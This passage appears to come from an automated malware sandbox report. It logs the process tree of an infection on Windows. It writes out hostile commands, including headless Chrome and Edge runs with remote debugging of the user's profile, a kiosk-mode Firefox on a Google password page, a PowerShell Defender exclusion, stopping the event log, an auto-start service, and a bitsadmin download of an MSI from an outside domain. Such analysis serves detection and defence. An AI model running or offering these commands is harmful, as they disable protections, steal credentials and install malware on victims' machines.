                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=8144 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --start-minimized
                                6⤵
                                • Uses browser remote debugging
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3884
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffc47c2cc40,0x7ffc47c2cc4c,0x7ffc47c2cc58
                                  7⤵
                                    PID:4276
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1476,i,8669438936092114250,3523566547233333022,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1464 /prefetch:2
                                    7⤵
                                      PID:3460
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1892,i,8669438936092114250,3523566547233333022,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1888 /prefetch:3
                                      7⤵
                                        PID:5628
                                    • C:\Windows\system32\tasklist.exe
                                      "tasklist" /FI "IMAGENAME eq msedge.exe"
                                      6⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6056
                                    • C:\Windows\system32\taskkill.exe
                                      "taskkill" /F /IM msedge.exe
                                      6⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4572
                                    • C:\Windows\system32\tasklist.exe
                                      "tasklist" /FI "IMAGENAME eq msedge.exe"
                                      6⤵
                                      • Enumerates processes with tasklist
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6108
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --restore-last-session --remote-debugging-port=8690 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default --start-minimized
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:5576
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffc5e7846f8,0x7ffc5e784708,0x7ffc5e784718
                                        7⤵
                                          PID:1808
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1452,2990661148139646210,9620321358418215622,131072 --disable-features=PaintHolding --headless --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1384 /prefetch:2
                                          7⤵
                                            PID:5608
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1452,2990661148139646210,9620321358418215622,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1892 /prefetch:3
                                            7⤵
                                              PID:5652
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=8690 --allow-pre-commit-input --field-trial-handle=1452,2990661148139646210,9620321358418215622,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1988 /prefetch:1
                                              7⤵
                                              • Uses browser remote debugging
                                              PID:5384
                                          • C:\Windows\system32\tasklist.exe
                                            "tasklist" /FI "IMAGENAME eq chrome.exe"
                                            6⤵
                                            • Enumerates processes with tasklist
                                            PID:2704
                                          • C:\Windows\system32\taskkill.exe
                                            "taskkill" /F /IM chrome.exe
                                            6⤵
                                            • Kills process with taskkill
                                            PID:4576
                                          • C:\Windows\system32\tasklist.exe
                                            "tasklist" /FI "IMAGENAME eq chrome.exe"
                                            6⤵
                                            • Enumerates processes with tasklist
                                            PID:2860
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless --restore-last-session --remote-debugging-port=8569 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --start-minimized
                                            6⤵
                                            • Uses browser remote debugging
                                            PID:4516
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xa0,0x10c,0x7ffc47c2cc40,0x7ffc47c2cc4c,0x7ffc47c2cc58
                                              7⤵
                                                PID:6092
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1496,i,6396737453785902756,15470586841224863020,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1484 /prefetch:2
                                                7⤵
                                                  PID:1244
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1908,i,6396737453785902756,15470586841224863020,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1904 /prefetch:3
                                                  7⤵
                                                    PID:4268
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist" /FI "IMAGENAME eq msedge.exe"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:1472
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM msedge.exe
                                                  6⤵
                                                  • Kills process with taskkill
                                                  PID:2480
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist" /FI "IMAGENAME eq chrome.exe"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:5812
                                                • C:\Windows\system32\taskkill.exe
                                                  "taskkill" /F /IM chrome.exe
                                                  6⤵
                                                  • Kills process with taskkill
                                                  PID:4548
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:4392
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:5632
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:1288
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:1652
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:5364
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:2480
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:4772
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:2012
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:6108
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:2360
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:4320
                                                • C:\Windows\system32\tasklist.exe
                                                  "tasklist"
                                                  6⤵
                                                  • Enumerates processes with tasklist
                                                  PID:5796
                                            • C:\Users\Admin\AppData\Local\Temp\10105080101\bf7448f335.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10105080101\bf7448f335.exe"
                                              4⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4120
                                            • C:\Users\Admin\AppData\Local\Temp\10105090101\c88538e7f8.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10105090101\c88538e7f8.exe"
                                              4⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of SetThreadContext
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4028
                                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                5⤵
                                                • Downloads MZ/PE file
                                                • System Location Discovery: System Language Discovery
                                                PID:1136
                                            • C:\Users\Admin\AppData\Local\Temp\10105100101\5fc5441f21.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10105100101\5fc5441f21.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3756
                                              • C:\Users\Admin\AppData\Local\Temp\10105100101\5fc5441f21.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10105100101\5fc5441f21.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:4344
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 800
                                                5⤵
                                                • Program crash
                                                PID:1716
                                            • C:\Users\Admin\AppData\Local\Temp\10105110101\c87b70999a.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10105110101\c87b70999a.exe"
                                              4⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • Suspicious use of SetThreadContext
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2636
                                              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                5⤵
                                                • Downloads MZ/PE file
                                                • System Location Discovery: System Language Discovery
                                                PID:4668
                                            • C:\Users\Admin\AppData\Local\Temp\10105120101\9477e6b607.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10105120101\9477e6b607.exe"
                                              4⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2472
                                            • C:\Users\Admin\AppData\Local\Temp\10105130101\def9b93fda.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10105130101\def9b93fda.exe"
                                              4⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2148
                                            • C:\Users\Admin\AppData\Local\Temp\10105140101\55d0c911a5.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10105140101\55d0c911a5.exe"
                                              4⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Downloads MZ/PE file
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              PID:2680
                                              • C:\Users\Admin\AppData\Local\Temp\PJP4PW4KECYTQO6YF3J6DVHM3DGL0.exe
                                                "C:\Users\Admin\AppData\Local\Temp\PJP4PW4KECYTQO6YF3J6DVHM3DGL0.exe"
                                                5⤵
                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                • Checks BIOS information in registry
                                                • Executes dropped EXE
                                                • Identifies Wine through registry keys
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                • System Location Discovery: System Language Discovery
                                                PID:788
                                            • C:\Users\Admin\AppData\Local\Temp\10105150101\35831d46e2.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10105150101\35831d46e2.exe"
                                              4⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              PID:4352
                                            • C:\Users\Admin\AppData\Local\Temp\10105160101\8dbeefc025.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10105160101\8dbeefc025.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:3236
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM firefox.exe /T
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4876
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM chrome.exe /T
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4092
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM msedge.exe /T
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:60
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM opera.exe /T
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1976
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM brave.exe /T
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2904
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                5⤵
                                                  PID:3888
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                    6⤵
                                                    • Checks processor information in registry
                                                    • Modifies registry class
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:436
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 27194 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e76d63f5-96d0-4337-b4dc-c488c12f4817} 436 "\\.\pipe\gecko-crash-server-pipe.436" gpu
                                                      7⤵
                                                        PID:3924
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2452 -prefsLen 28114 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {db216c66-8486-4272-b301-b7af35fb89c3} 436 "\\.\pipe\gecko-crash-server-pipe.436" socket
                                                        7⤵
                                                          PID:2296
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2928 -childID 1 -isForBrowser -prefsHandle 2992 -prefMapHandle 3160 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 1232 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2bea2eea-b04b-4999-9a6b-15aa0cb72cc0} 436 "\\.\pipe\gecko-crash-server-pipe.436" tab
                                                          7⤵
                                                            PID:2152
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4048 -childID 2 -isForBrowser -prefsHandle 4040 -prefMapHandle 4036 -prefsLen 32604 -prefMapSize 244628 -jsInitHandle 1232 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5df97971-dc30-4b56-a0b7-001c0e7da08d} 436 "\\.\pipe\gecko-crash-server-pipe.436" tab
                                                            7⤵
                                                              PID:1052
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4496 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4632 -prefMapHandle 4628 -prefsLen 32604 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3394b5d-ff5e-46d1-b173-23e2da84a59d} 436 "\\.\pipe\gecko-crash-server-pipe.436" utility
                                                              7⤵
                                                              • Checks processor information in registry
                                                              PID:5900
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5152 -childID 3 -isForBrowser -prefsHandle 5184 -prefMapHandle 3984 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1232 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fa77fb9-a29a-49c0-a8e9-2d87aeeb02ca} 436 "\\.\pipe\gecko-crash-server-pipe.436" tab
                                                              7⤵
                                                                PID:5240
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5108 -childID 4 -isForBrowser -prefsHandle 5296 -prefMapHandle 5304 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1232 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd49866e-ce73-4638-814a-c262e97e710f} 436 "\\.\pipe\gecko-crash-server-pipe.436" tab
                                                                7⤵
                                                                  PID:5280
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5468 -childID 5 -isForBrowser -prefsHandle 5548 -prefMapHandle 5544 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1232 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f7014cd-fa6c-4cfe-bbb8-7f742f8866db} 436 "\\.\pipe\gecko-crash-server-pipe.436" tab
                                                                  7⤵
                                                                    PID:5396
                                                            • C:\Users\Admin\AppData\Local\Temp\10105170101\3b099ae350.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10105170101\3b099ae350.exe"
                                                              4⤵
                                                              • Modifies Windows Defender DisableAntiSpyware settings
                                                              • Modifies Windows Defender Real-time Protection settings
                                                              • Modifies Windows Defender TamperProtection settings
                                                              • Modifies Windows Defender notification settings
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Windows security modification
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:512
                                                            • C:\Users\Admin\AppData\Local\Temp\10105180101\v6Oqdnc.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10105180101\v6Oqdnc.exe"
                                                              4⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5896
                                                            • C:\Users\Admin\AppData\Local\Temp\10105190101\OEHBOHk.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10105190101\OEHBOHk.exe"
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Drops file in System32 directory
                                                              PID:6056
                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                5⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                PID:4596
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                5⤵
                                                                  PID:3272
                                                                  • C:\Windows\system32\wusa.exe
                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                    6⤵
                                                                      PID:5352
                                                                  • C:\Windows\system32\powercfg.exe
                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                    5⤵
                                                                    • Power Settings
                                                                    PID:3884
                                                                  • C:\Windows\system32\powercfg.exe
                                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                    5⤵
                                                                    • Power Settings
                                                                    PID:4552
                                                                  • C:\Windows\system32\powercfg.exe
                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                    5⤵
                                                                    • Power Settings
                                                                    PID:5412
                                                                  • C:\Windows\system32\powercfg.exe
                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                    5⤵
                                                                    • Power Settings
                                                                    PID:1740
                                                                  • C:\Windows\system32\sc.exe
                                                                    C:\Windows\system32\sc.exe delete "DWENDQPG"
                                                                    5⤵
                                                                    • Launches sc.exe
                                                                    PID:5596
                                                                  • C:\Windows\system32\sc.exe
                                                                    C:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"
                                                                    5⤵
                                                                    • Launches sc.exe
                                                                    PID:3520
                                                                  • C:\Windows\system32\sc.exe
                                                                    C:\Windows\system32\sc.exe stop eventlog
                                                                    5⤵
                                                                    • Launches sc.exe
                                                                    PID:1180
                                                                  • C:\Windows\system32\sc.exe
                                                                    C:\Windows\system32\sc.exe start "DWENDQPG"
                                                                    5⤵
                                                                    • Launches sc.exe
                                                                    PID:4392
                                                                • C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe"
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetThreadContext
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:4500
                                                                  • C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe"
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5888
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 800
                                                                    5⤵
                                                                    • Program crash
                                                                    PID:3920
                                                                • C:\Users\Admin\AppData\Local\Temp\10105210101\Y87Oyyz.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\10105210101\Y87Oyyz.exe"
                                                                  4⤵
                                                                    PID:2940
                                                                    • C:\Windows\Temp\{4B5DED03-C70B-415B-B68D-964CD7833540}\.cr\Y87Oyyz.exe
                                                                      "C:\Windows\Temp\{4B5DED03-C70B-415B-B68D-964CD7833540}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10105210101\Y87Oyyz.exe" -burn.filehandle.attached=536 -burn.filehandle.self=532
                                                                      5⤵
                                                                        PID:6008
                                                                        • C:\Windows\Temp\{894671EB-8773-4B56-81E8-BDB70B667CD0}\.ba\SplashWin.exe
                                                                          C:\Windows\Temp\{894671EB-8773-4B56-81E8-BDB70B667CD0}\.ba\SplashWin.exe
                                                                          6⤵
                                                                            PID:1568
                                                                            • C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
                                                                              C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
                                                                              7⤵
                                                                                PID:2404
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\SysWOW64\cmd.exe
                                                                                  8⤵
                                                                                    PID:4344
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10105221121\fCsM05d.cmd"
                                                                            4⤵
                                                                              PID:5576
                                                                              • C:\Windows\SysWOW64\fltMC.exe
                                                                                fltmc
                                                                                5⤵
                                                                                  PID:5704
                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                  bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\Admin\AppData\Local\Temp\vrep_install\vrep.msi"
                                                                                  5⤵
                                                                                  • Download via BitsAdmin
                                                                                  PID:4612
                                                                              • C:\Users\Admin\AppData\Local\Temp\10105230101\zY9sqWs.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\10105230101\zY9sqWs.exe"
                                                                                4⤵
                                                                                  PID:2084
                                                                          • C:\Windows\SysWOW64\WerFault.exe
